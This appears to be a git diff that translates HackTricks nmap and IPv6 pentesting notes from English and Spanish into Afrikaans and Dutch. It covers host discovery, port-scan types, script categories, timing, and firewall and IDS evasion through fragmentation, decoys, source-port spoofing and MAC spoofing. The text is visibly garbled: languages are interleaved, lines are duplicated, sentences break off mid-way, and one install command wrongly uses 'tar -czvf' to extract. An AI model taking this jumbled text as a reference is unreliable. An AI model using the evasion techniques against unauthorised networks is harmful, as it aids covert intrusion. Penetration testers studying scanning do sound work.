* **`-sn`** : **Geen poort skandering**. Nadat die verkenningsfase voltooi is, skandeer dit nie poorte nie. Dit is relatief stil en maak 'n klein netwerk skandering moontlik. Met voorregte stuur dit 'n ACK (-PA) na 80, 'n SYN(-PS) na 443 en 'n echo versoek en 'n Timestamp versoek, sonder voorregte voltooi dit altyd verbindings. As die teiken die netwerk is, gebruik dit slegs ARP(-PR). As dit saam met 'n ander opsie gebruik word, word slegs die pakkies van die ander opsie laat val.
* **`-PR`**: **Ping ARP**. Dit word standaard gebruik wanneer rekenaars in ons netwerk geanaliseer word, dit is vinniger as om pings te gebruik. As jy nie ARP-pakkies wil gebruik nie, gebruik `--send-ip`.
* **`-PS <ports>`**: Dit stuur SYN-pakkies na poorte waarop as dit antwoord met SYN/ACK dit oop is (waarop dit met RST antwoord om die verbinding nie te beëindig nie), as dit met RST antwoord is dit gesluit en as dit nie antwoord nie is dit onbereikbaar. In die geval van geen voorregte word 'n totale verbinding outomaties gebruik. As geen poorte gegee word, stuur dit dit na 80.
* **`-PA <ports>`**: Soos die vorige een, maar met ACK, deur beide te kombineer gee dit beter resultate.
* **`-PU <ports>`**: Die doel is die teenoorgestelde, dit word gestuur na poorte wat verwag word om gesluit te wees. Sommige vuurmuure kyk slegs na TCP-verbindings. As dit gesluit is, word daar met 'n onbereikbare poort geantwoord, as daar met 'n ander ICMP geantwoord word of nie geantwoord word nie, word dit as 'n onbereikbare bestemming gelaat.
* **`-PE, -PP, -PM`** : ICMP PINGS: echo antwoord, tydmerk en adresmasker. Dit word geloods om uit te vind of die teiken aktief is.
* **`-PY<ports>`**: Stuur SCTP INIT sondes na 80 standaard, INIT-ACK(oop) of ABORT(gesluit) of niks of ICMP onbereikbaar(inaktief) kan geantwoord word.
* **`-PO <protocols>`**: 'n Protokol word aangedui in die koppe, standaard 1(ICMP), 2(IGMP) en 4(Encap IP). Vir ICMP, IGMP, TCP (6) en UDP (17) protokolle word die protokol koppe gestuur, vir die res word slegs die IP-kop gestuur. Die doel hiervan is dat as gevolg van die misvorming van die koppe, Protokol onbereikbaar of antwoorde van dieselfde protokol geantwoord word om te weet of dit aktief is.
* **`-n`**: Geen DNS
* **`-R`**: DNS altyd
### Port scanning techniques
### Poort skandering tegnieke
* **`-sS`**: Does not complete the connection so it leaves no trace, very good if it can be used.(privileges) It is the one used by default.
* **`-sT`**: Completes the connection, so it does leave a trace, but it can be used for sure. By default without privileges.
* **`-sU`**: Slower, for UDP. Mostly: DNS(53), SNMP(161,162), DHCP(67 and 68), (-sU53,161,162,67,68): open(reply), closed(port unreachable), filtered (another ICMP), open/filtered (nothing). In case of open/filtered, -sV sends numerous requests to detect any of the versions that nmap supports and can detect the true state. It increases a lot the time.
* **`-sY`**: SCTP protocol fails to establish the connection, so there are no logs, works like -PY
* **`-sN,-sX,-sF`:** Null, Fin, Xmas, they can penetrate some firewalls and extract information. They are based on the fact that standard compliant machines should respond with RST all requests that do not have SYN, RST or ACK lags raised: open/filtered(nothing), closed(RST), filtered (ICMP unreachable). Unreliable on WIndows, CIsco, BSDI and OS/400. On unix yes.
* **`-sM`**: Maimon scan: Sends FIN and ACK flags, used for BSD, currently will return all as closed.
* **`-sA, sW`**: ACK and Window, is used to detect firewalls, to know if the ports are filtered or not. The -sW does distinguish between open/closed since the open ones respond with a different window value: open (RST with window other than 0), closed (RST window = 0), filtered (ICMP unreachable or nothing). Not all computers work this way, so if it is all closed, it is not working, if it is a few open, it is working fine, and if it is many open and few closed, it is working the other way around.
* **`-sI`:** Idle scan. For the cases in which there is an active firewall but we know that it does not filter to a certain Ip (or when we simply want anonymity) we can use the zombie scanner (it works for all the ports), to look for possible zombies we can use the scrpit ipidseq or the exploit auxiliary/scanner/ip/ipidseq. This scanner is based on the IPID number of the IP packets.
* **`--badsum`:** It sends the sum wrong, the computers would discard the packets, but the firewalls could answer something, it is used to detect firewalls.
* **`-sZ`:** "Weird" SCTP scanner, when sending probes with cookie echo fragments they should be dropped if open or responded with ABORT if closed. It can pass through firewalls that init does not pass through, the bad thing is that it does not distinguish between filtered and open.
* **`-sO`:** Protocol Ip scan. Sends bad and empty headers in which sometimes not even the protocol can be distinguished. If ICMP unreachable protocol arrives it is closed, if unreachable port arrives it is open, if another error arrives, filtered, if nothing arrives, open|filtered.
* **`-b <server>`:** FTPhost--> It is used to scan a host from another one, this is done by connecting the ftp of another machine and asking it to send files to the ports that you want to scan from another machine, according to the answers we will know if they are open or not. \[\<user>:\<password>@]\<server>\[:\<port>] Almost all ftps servers no longer let you do this and therefore it is of little practical use.
### **Centrar análisis**
**-p:** Sirve para dar los puertos a escanear. Para seleccionar los 65335: **-p-** o **-p all**. Nmap tiene una clasificaación interna según su popularidad. Por defecto usa los 1000 ppales. Con **-F** (fast scan) analiza los 100 ppales. Con **--top-ports \<numero>** Analiza ese numero de ppales (de 1 hasta los 65335). Comprueba los puertos en orden aleatorio, para que eso no pase **-r**. También podemos seleccionar puertos: 20-30,80,443,1024- Esto ultimo significa que mire en adelante del 1024. También podemos agrupar los puertos por protocolos: U:53,T:21-25,80,139,S:9. También podemos escoger un rango dentro de los puertos populares de nmap: -p \[-1024] analiza hasta el 1024 de los incluidos en nmap-services. **--port-ratio \<ratio>** Analiza los puertos más comúnes que un ratio que debe estar entre 0 y 1
**-sV** Escaneado de versión, se puede regular la intensidad de 0 a 9, por defecto 7.
**--version-intensity \<numero>** Regulamos la intensidad, de forma que cuanto más bajo solo lanzará las sondas más probables, pero no todas. Con esto podemos acortar considerablemente el tiempo de escaneo UDP
**-O** Deteccion de os
**--osscan-limit** Para escanear bien un host se necesita que al menos haya 1 puerto abierto y otro cerrado, si no se da esta condición y hemos puesto esto, no intenta hacer predicción de os (ahorra tiempo)
**--osscan-guess** Cuando la detección de os no es perfecta esto hace que se esfuerce más
* **`-sS`**: Voltooi nie die verbinding nie, so dit laat geen spoor agter nie, baie goed as dit gebruik kan word.(voorregte) Dit is die een wat standaard gebruik word.
* **`-sT`**: Voltooi die verbinding, so dit laat 'n spoor agter, maar dit kan veilig gebruik word. Standaard sonder voorregte.
* **`-sU`**: Stadiger, vir UDP. Meestal: DNS(53), SNMP(161,162), DHCP(67 en 68), (-sU53,161,162,67,68): oop(antwoord), gesluit(poort onbereikbaar), gefiltreer (ander ICMP), oop/gefiltreer (niks). In die geval van oop/gefiltreer, stuur -sV talle versoek om enige van die weergawes wat nmap ondersteun op te spoor en die ware toestand te bepaal. Dit verhoog die tyd aansienlik.
* **`-sY`**: SCTP-protokol slaag nie daarin om die verbinding te vestig nie, so daar is geen logboeke nie, werk soos -PY
* **`-sN,-sX,-sF`:** Null, Fin, Xmas, hulle kan deur sommige vuurmuure dring en inligting onttrek. Dit is gebaseer op die feit dat standaard voldoenende masjiene met RST op alle versoek wat nie SYN, RST of ACK vlae het nie moet antwoord: oop/gefiltreer(niks), gesluit(RST), gefiltreer (ICMP onbereikbaar). Onbetroubaar op Windows, CIsco, BSDI en OS/400. Op Unix wel.
* **`-sM`**: Maimon skandering: Stuur FIN- en ACK-vlae, gebruik vir BSD, tans sal dit alles as gesluit terugkeer.
* **`-sA, sW`**: ACK en Window, word gebruik om vuurmuure op te spoor, om te weet of die poorte gefiltreer word of nie. Die -sW onderskei tussen oop/gesluit aangesien die oop een met 'n ander vensterwaarde antwoord: oop (RST met venster anders as 0), gesluit (RST-venster = 0), gefiltreer (ICMP onbereikbaar of niks). Nie alle rekenaars werk op hierdie manier nie, so as dit alles gesluit is, werk dit nie, as dit 'n paar oop is, werk dit goed, en as dit baie oop en min gesluit is, werk dit die ander kant toe.
* **`-sI`:** Idle skandering. Vir gevalle waar daar 'n aktiewe vuurmuur is, maar ons weet dat dit nie na 'n sekere IP filter nie (of wanneer ons eenvoudig anonimiteit wil hê), kan ons die zombie skanderingsinstrument gebruik (dit werk vir alle poorte), om moontlike zombies te soek, kan ons die ipidseq skrip of die exploit auxiliary/scanner/ip/ipidseq gebruik. Hierdie skanderingsinstrument is gebaseer op die IPID-nommer van die IP-pakkies.
* **`--badsum`:** Dit stuur die som verkeerd, die rekenaars sal die pakkies verwerp, maar die vuurmuure kan iets antwoord, dit word gebruik om vuurmuure op te spoor.
* **`-sZ`:** "Vreemde" SCTP-skanderingsinstrument, wanneer sondes met koekie-echo-fragmente gestuur word, moet dit laat val word as dit oop is of met ABORT geantwoord word as dit gesluit is. Dit kan deur vuurmuure gaan waardeur init nie kan gaan nie
**--osscan-guess** Wanneer OS-detectie niet perfect is, zorgt dit ervoor dat er meer inspanning wordt geleverd.
**Scripts**
\--script _\<filename>_|_\<category>_|_\<directory>_|_\<expression>_\[,...]
Para usar los de por efecto vale con -sC o --script=default
Om de standaardscripts te gebruiken, volstaat het om -sC of --script=default te gebruiken.
Los tipos que hay son de: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln
De beschikbare categorieën zijn: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version en vuln.
* **Auth:** ejecuta todos sus _scripts_ disponibles para autenticación
* **Default:** ejecuta los _scripts_ básicos por defecto de la herramienta
* **Discovery:** recupera información del _target_ o víctima
* **External:** _script_ para utilizar recursos externos
* **Intrusive:** utiliza _scripts_ que son considerados intrusivos para la víctima o _target_
* **Malware:** revisa si hay conexiones abiertas por códigos maliciosos o _backdoors_ (puertas traseras)
* **Safe:** ejecuta _scripts_ que no son intrusivos
* **Vuln:** descubre las vulnerabilidades más conocidas
* **All:** ejecuta absolutamente todos los _scripts_ con extensión NSE disponibles
* **Auth:** voert alle beschikbare scripts uit voor authenticatie.
* **Default:** voert de standaard basis scripts van de tool uit.
* **Discovery:** haalt informatie op van het doelwit of slachtoffer.
* **External:** script om externe bronnen te gebruiken.
* **Intrusive:** gebruikt scripts die als indringend worden beschouwd voor het doelwit of slachtoffer.
* **Malware:** controleert of er open verbindingen zijn door kwaadaardige code of achterdeuren.
* **Safe:** voert scripts uit die niet indringend zijn.
* **Vuln:** ontdekt de meest bekende kwetsbaarheden.
* **All:** voert alle beschikbare NSE-scripts uit.
Para buscar scripts:
Om scripts te zoeken:
**nmap --script-help="http-\*" -> Los que empiecen por http-**
**nmap --script-help="http-\*" -> Die wat met http- begin**
**nmap --script-help="not intrusive" -> Todos menos esos**
**nmap --script-help="not intrusive" -> Alles behalwe dit**
**nmap --script-help="default or safe" -> Los que estan en uno o en otro o en ambos**
**nmap --script-help="default or safe" -> Die in een van beide of beide categorieën vallen**
**nmap --script-help="default and safe" --> Los que estan en ambos**
**nmap --script-help="default and safe" --> Die in beide categorieën vallen**
**nmap --script-help="(default or safe or intrusive) and not http-\*"**
@ -108,43 +91,43 @@ Para buscar scripts:
\--script-help _\<filename>_|_\<category>_|_\<directory>_|_\<expression>_|all\[,...]
\--script-trace ---> Da info de como va elscript
\--script-trace ---> Geeft informatie over de voortgang van het script.
\--script-updatedb
**Para usar un script solo hay que poner: namp --script Nombre\_del\_script objetivo** --> Al poner el script se ejecutará tanto el script como el escaner, asi que tambien se pueden poner opciones del escaner, podemos añadir **“safe=1”** para que se ejecuten solo los que sean seguros.
Om een script te gebruiken, hoef je alleen maar het volgende in te voeren: nmap --script Naam\_van\_script doelwit --> Door het script op te geven, wordt zowel het script als de scanner uitgevoerd. Je kunt ook scanneropties toevoegen, zoals "safe=1", zodat alleen veilige scripts worden uitgevoerd.
**Control tiempo**
**Tijdbeheer**
**Nmap puede modificar el tiempo en segundos, minutos, ms:** --host-timeout arguments 900000ms, 900, 900s, and 15m all do the same thing.
**Nmap kan de tijd in seconden, minuten, ms aanpassen:** --host-timeout arguments 900000ms, 900, 900s en 15m doen allemaal hetzelfde.
Nmap divide el numero total de host a escanear en grupos y analiza esos grupos en bloques de forma que hasta que no han sido analizados todos, no pasa al siguiente bloque (y el usuario tampoco recibe ninguna actualización hasta que se haya analizado el bloque) de esta forma, es más óptimo para nmap usar grupos grandes. Por defecto en clase C usa 256.
Nmap verdeelt het totale aantal te scannen hosts in groepen en analyseert deze groepen in blokken, zodat het pas naar het volgende blok gaat nadat alle hosts zijn geanalyseerd (en de gebruiker ontvangt ook geen updates totdat het blok is geanalyseerd). Op deze manier is het voor Nmap efficiënter om grote groepen te gebruiken. Standaard gebruikt het 256 voor klasse C.
Se puede cambiar con\*\*--min-hostgroup\*\* _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_ (Adjust parallel scan group sizes)
Dit kan worden gewijzigd met **--min-hostgroup** _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_ (Pas de grootte van parallelle scantaken aan)
Se puede controlar el numero de escaners en paralelo pero es mejor que no (nmpa ya incorpora control automatico en base al estado de la red): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
Het aantal parallelle scanners kan worden gecontroleerd, maar het is beter om dit niet te doen (Nmap heeft al automatische controle op basis van de netwerkstatus): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
Podemos modificar el rtt timeout, pero no suele ser necesario: **--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_
We kunnen de RTT-timeout aanpassen, maar dit is meestal niet nodig: **--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_
Podemos modificar el numero de intentos:**--max-retries** _**\<numtries>**_
We kunnen het aantal pogingen aanpassen: **--max-retries** _**\<numtries>**_
Podemos modificar el tiempo de escaneado de un host: **--host-timeout** _**\<time>**_
We kunnen de scantijd voor een host aanpassen: **--host-timeout** _**\<time>**_
Podemos modificar el tiempo entre cada prueba para que vaya despacio: **--scan-delay** _**\<time>**_**;** **--max-scan-delay** _**\<time>**_
We kunnen de tijd tussen elke probe aanpassen om het langzamer te laten verlopen: **--scan-delay** _**\<time>**_**;** **--max-scan-delay** _**\<time>**_
Podemos modificar el numero de paquetes por segundo: **--min-rate** _**\<number>**_**;** **--max-rate** _**\<number>**_
We kunnen het aantal pakketten per seconde aanpassen: **--min-rate** _**\<number>**_**;** **--max-rate** _**\<number>**_
Muchos puertos tardan mucho en responder al estar filtrados o cerrados, si solo nos interesan los abiertos, podemos ir más rápido con: **--defeat-rst-ratelimit**
Veel poorten reageren traag als ze gefilterd of gesloten zijn. Als we alleen geïnteresseerd zijn in open poorten, kunnen we sneller scannen met: **--defeat-rst-ratelimit**
Para definir lo agresivo que queremos que sea nmap: -T paranoid|sneaky|polite|normal|aggressive|insane
Om de agressiviteit van Nmap in te stellen: -T paranoid|sneaky|polite|normal|aggressive|insane
\-T (0-1)
\-T0 --> Solo se escanea 1 puerto a la vez y se espera 5min hasta el siguiente
\-T0 --> Er wordt slechts één poort tegelijk gescand en er wordt 5 minuten gewacht voordat de volgende wordt gescand.
\-T1 y T2 --> Muy parecidos pero solo esperan 15 y 0,4seg respectivamente enttre cada prueba
\-T1 en T2 --> Zeer vergelijkbaar, maar wachten respectievelijk 15 en 0,4 seconden tussen elke probe.
\-T3 --> Funcionamiento por defecto, incluye en paralelo
\-T3 --> Standaard werking, inclusief parallelle scans.
\-T4 --> --max-rtt-timeout 1250ms --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --max-retries 6 --max-scan-delay 10ms
@ -152,91 +135,80 @@ Para definir lo agresivo que queremos que sea nmap: -T paranoid|sneaky|polite|no
**Firewall/IDS**
No dejan pasar a puertos y analizan paquetes.
Ze blokkeren poorten en analyseren pakketten.
**-f** Para fragmentar paquetes, por defecto los fragmenta en 8bytes después de la cabecera, para especificar ese tamaño usamos ..mtu (con esto, no usar -f), el offset debe ser multiplo de 8. **Escaners de version y scripts no soportan la fragmentacion**
**-f** Om pakketten te fragmenteren, worden ze standaard gefragmenteerd in blokken van 8 bytes na de header. Om de grootte op te geven, gebruiken we ..mtu (in plaats van -f). De offset moet een veelvoud van 8 zijn. **Versie-scanners en scripts ondersteunen geen fragmentatie.**
**-D decoy1,decoy2,ME** Nmap envia escaneres pero con otras direcciones IPs como origen, de esta forma te esconden a ti. Si pones el ME en la lista, nmap te situara ahi, mejor poner 5 o 6 antes de ti para que te enmascaren completamente. Se pueden generar iPs aleatorias con RND:\<numero> Para generar \<numero> de Ips aleatorias. No funcionan con detector de versiones sin conexion de TCP. Si estas dentro de una red, te interesa usar Ips que esten activas, pues sino será muy facil averiguar que tu eres la unica activa.
**-D decoy1,decoy2,ME** Nmap stuurt scans met andere IP-adressen als bron, waardoor je verborgen blijft. Als je ME in de lijst plaatst, zal Nmap je daar plaatsen. Het is beter om 5 of 6 adressen voor jezelf te plaatsen om volledig verborgen te blijven. Je kunt willekeurige IP-adressen genereren met RND:\<nummer> om een bepaald aantal willekeurige IP-adressen te genereren. Ze werken niet met offline TCP-versiedetectie. Als je je binnen een netwerk bevindt, is het handig om IP-adressen te gebruiken die actief zijn, anders is het gemakkelijk te achterhalen dat jij de enige actieve bent.
Para usar Ips aleatorias: nmap-D RND: 10 Ip\_objetivo
Om willekeurige IP-adressen te gebruiken: nmap -D RND:10 Doel_IP
**-S IP** Para cuando Nmap no pilla tu dirección Ip se la tienes que dar con eso. También sirve para hacer pensar que hay otro objetivo escaneandoles.
**-S IP** Als Nmap je IP-adres niet kan achterhalen, moet je het opgeven met deze optie. Het kan ook worden gebruikt om te laten denken dat er een ander doelwit hen scant.
**-e \<interface>** Para elegir la interfaz
**-e \<interface>** Om de interface te kiezen.
Muchos administradores dejan puertos de entrada abiertos para que todo funcione correctamente y les es más fácil que buscar otra solución. Estos pueden ser los puertos DNS o los de FTP... para busca esta vulnerabilidad nmap incorpora: **--source-port** _**\<portnumber>**_**;-g** _**\<portnumber>**_ _Son equivalentes_
Veel beheerders laten ingangspoorten open zodat alles correct werkt en het gemakkelijker is dan naar een andere oplossing te zoeken. Dit kunnen bijvoorbeeld DNS-poorten of FTP-poorten zijn. Om deze kwetsbaarheid te vinden, heeft Nmap: **--source-port** _**\<portnumber>**_**;-g** _**\<portnumber>**_ (ze zijn equivalent).
**--data** _**\<hex string>**_ Para enviar texto hexadecimal: --data 0xdeadbeef and --data \xCA\xFE\x09
**--data** _**\<hex string>**_ Om hexadecimale tekst te verzenden: --data 0xdeadbeef en --data \xCA\xFE\x09
**--data-string** _**\<string>**_ Para enviar un texto normal: --data-string "Scan conducted by Security Ops, extension 7192"
**--data-string** _**\<string>**_ Om normale tekst te verzenden: --data-string "Scan conducted by Security Ops, extension 7192"
**--data-length** _**\<number>**_ Nmap envía solo cabeceras, con esto logramos que añada a estar un numero de bytes mas (que se generaran aleatoriamente)
**--data-length** _**\<number>**_ Nmap stuurt alleen headers, met deze optie kunnen we een bepa
**--proxies** _**\<Komma-geskeide lys van proxy-URL's>**_ Om proxies te gebruik, is dit soms nodig om die parallelisme aan te pas as 'n proxy nie soveel oop verbindinge toelaat soos wat nmap wil hê nie: --max-parallelism
Para configurar el paquete IP completamente usar **--ip-options**
**-sP** Om gasheer in die netwerk te ontdek deur ARP
If you wish to see the options in packets sent and received, specify --packet-trace. For more information and examples of using IP options with Nmap, see [http://seclists.org/nmap-dev/2006/q3/52](http://seclists.org/nmap-dev/2006/q3/52).
Baie administrateurs skep 'n reël in die vuurmuur wat alle pakkies van 'n spesifieke poort (soos 20, 53 en 67) toelaat om deur te gaan. Ons kan nmap instrueer om ons pakkies van daardie poorte af te stuur: **nmap --source-port 53 Ip**
**--ttl** _**\<value>**_
**Uitsette**
**--randomize-hosts** Para que el ataque sea menos obvio
**-oN file** Normale uitset
**--spoof-mac** _**\<MAC address, prefix, or vendor name>**_ Para cambiar la mac ejemplos: Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2, and Cisco
**-oX file** XML-uitset
**--proxies** _**\<Comma-separated list of proxy URLs>**_ Para usar proxies, a veces un proxy no mantiene tantas conexiones abiertas como nmap quiere por lo que habria que modificar el paralelismo: --max-parallelism
**-oS file** Script kidies-uitset
**-sP** Para descubrir host en la red en la que estamos por ARP
**-oG file** Grepable uitset
Muchos administradores crean una regla en el firewall que permite pasar todos los paquetes que provienen de un puerto en particular (como el 20,53 y 67), podemos decire a nmap que mande nuestros paquetes desde esos puertos: **nmap --source-port 53 Ip**
**-oA file** Alles behalwe -oS
**Salidas**
**-v level** verbytheid
**-oN file** Salida normal
**-d level** foutopsporing
**-oX file** Salida XML
**--reason** Rede vir gasheer en status
**-oS file** Salida de script kidies
**--stats-every time** Elke tyd vertel ons hoe dit gaan
**-oG file** Salida grepable
**--packet-trace** Om te sien watter pakkies uitgaan, kan filters soos --version-trace of --script-trace gespesifiseer word
**-oA file** Todos menos -oS
**--open** wys die oop, oop|gefilterde en nie-gefilterde
**-v level** verbosity
**--resume file** Gee 'n opsomming
**-d level** debugin
**Miscellaneous**
**--reason** Porqué del host y estado
**-6** Maak ipv6 moontlik
**--stats-every time** Cada ese tiempo nos dice como va
**--packet-trace** Para ver que paquetes salen se pueden especificar filtros como: --version-trace o --script-trace
**--open** muestra los abiertos, abiertos|filtrados y los no filtrados
**--resume file** Saca un resumen
**Miscelanea**
**-6** Permite ipv6
**-A** es lo mismo que -O -sV -sC --traceroute
**-A** Dit is dieselfde as -O -sV -sC --traceroute
**Run time**
Mientras corre nmap podemos cambiar opciones:
Terwyl nmap loop, kan ons opsies verander:
v / V Increase / decrease the verbosity level
v / V Verhoog / verlaag die verbytheidvlak
d / D Increase / decrease the debugging Level
d / D Verhoog / verlaag die foutopsporingsvlak
p / P Turn on / off packet tracing
p / P Skakel pakketspoor aan / af
? Print a runtime interaction help screen
? Druk 'n hulpskerm vir interaksie tydens uitvoering af
**Vulscan**
Script de nmap que mira las versiones de los servicios obtenidos en una base de datos offline (que descarga de otras muy importantes) y devuelve las posibles vulnerabilidades
'n Nmap-skrips wat die weergawes van dienste in 'n aflyn-databasis (wat dit aflaai van ander belangrike databasisse) ondersoek en moontlike kwesbaarhede teruggee
Las BD que usa son:
Die databasisse wat dit gebruik, is:
1. Scipvuldb.csv | [http://www.scip.ch/en/?vuldb](http://www.scip.ch/en/?vuldb)
2. Cve.csv | [http://cve.mitre.org](http://cve.mitre.org/)
@ -247,36 +219,36 @@ Las BD que usa son:
7. Exploitdb.csv | [http://www.exploit-db.com](http://www.exploit-db.com/)
8. Openvas.csv | [http://www.openvas.org](http://www.openvas.org/)
Para descargarlo e instalarlo en la carpeta de Nmap:
Om dit af te laai en in die Nmap-lys te installeer:
wget http://www.computec.ch/projekte/vulscan/download/nmap\_nse\_vulscan-2.0.tar.gz && tar -czvf nmap\_nse\_vulscan-2.0.tar.gz vulscan/ && sudo cp -r vulscan/ /usr/share/nmap/scripts/
También habría que descargar los paquetes de las BD y añadirlos a /usr/share/nmap/scripts/vulscan/
Daar sal ook pakkette van die databasisse afgelaai moet word en by /usr/share/nmap/scripts/vulscan/ gevoeg moet word
Uso:
Gebruik:
Para usar todos: sudo nmap -sV --script=vulscan HOST\_A\_ESCANEAR
Om almal te gebruik: sudo nmap -sV --script=vulscan HOST\_A\_ESCANEAR
Para usar una BD específica: sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST\_A\_ESCANEAR
Om 'n spesifieke databasis te gebruik: sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST\_A\_ESCANEAR
## Speed Up Nmap Service scan x16
## Versnel Nmap-dienskenner 16 keer
According [**to this post**](https://joshua.hu/nmap-speedup-service-scanning-16x) you can speed up the nmap service analysis by modifying all the **`totalwaitms`** values in **`/usr/share/nmap/nmap-service-probes`** to **300** and **`tcpwrappedms`** to **200**.
Volgens [**hierdie berig**](https://joshua.hu/nmap-speedup-service-scanning-16x) kan jy die nmap-diensanalise versnel deur al die **`totalwaitms`** waardes in **`/usr/share/nmap/nmap-service-probes`** te wysig na **300** en **`tcpwrappedms`** na **200**.
Moreover, probes which do not have a specifically defined **`servicewaitms`** use a default value of **`5000`**. Therefore, we can either add values to each of the probes, or we can **compile nmap** ourselves and change the default value in [**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79).
Verder gebruik sonder 'n spesifiek gedefinieerde **`servicewaitms`** gebruik 'n verstekwaarde van **`5000`**. Daarom kan ons waardes byvoeg vir elkeen van die sondes, of ons kan **nmap kompileer** en die verstekwaarde in [**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79) verander.
If you don't want to change the values of **`totalwaitms`** and **`tcpwrappedms`** at all in the `/usr/share/nmap/nmap-service-probes` file, you can edit the [parsing code](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) such that these values in the `nmap-service-probes` file are completely ignored.
As jy glad nie die waardes van **`totalwaitms`** en **`tcpwrappedms`** in die `/usr/share/nmap/nmap-service-probes` lêer wil verander nie, kan jy die [parsingskode](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) wysig sodat hierdie waardes in die `nmap-service-probes` lêer heeltemal geïgnoreer word.
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil hê jou **maatskappy geadverteer moet word in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

153
generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md
View file

@ -1,47 +1,44 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
# IPv6 Basic theory
# IPv6 Basiese teorie
## Networks
## Netwerke
IPv6 addresses are structured to enhance network organization and device interaction. An IPv6 address is divided into:
IPv6-adresse is gestruktureer om netwerkorganisasie en toestelinteraksie te verbeter. 'n IPv6-adres is verdeel in:
1. **Network Prefix**: The initial 48 bits, determining the network segment.
2. **Subnet ID**: Following 16 bits, used for defining specific subnets within the network.
3. **Interface Identifier**: The concluding 64 bits, uniquely identifying a device within the subnet.
1. **Netwerkvoorvoegsel**: Die aanvanklike 48-bits, wat die netwerksegment bepaal.
2. **Subnet-ID**: Die volgende 16-bits, wat gebruik word om spesifieke subnets binne die netwerk te definieer.
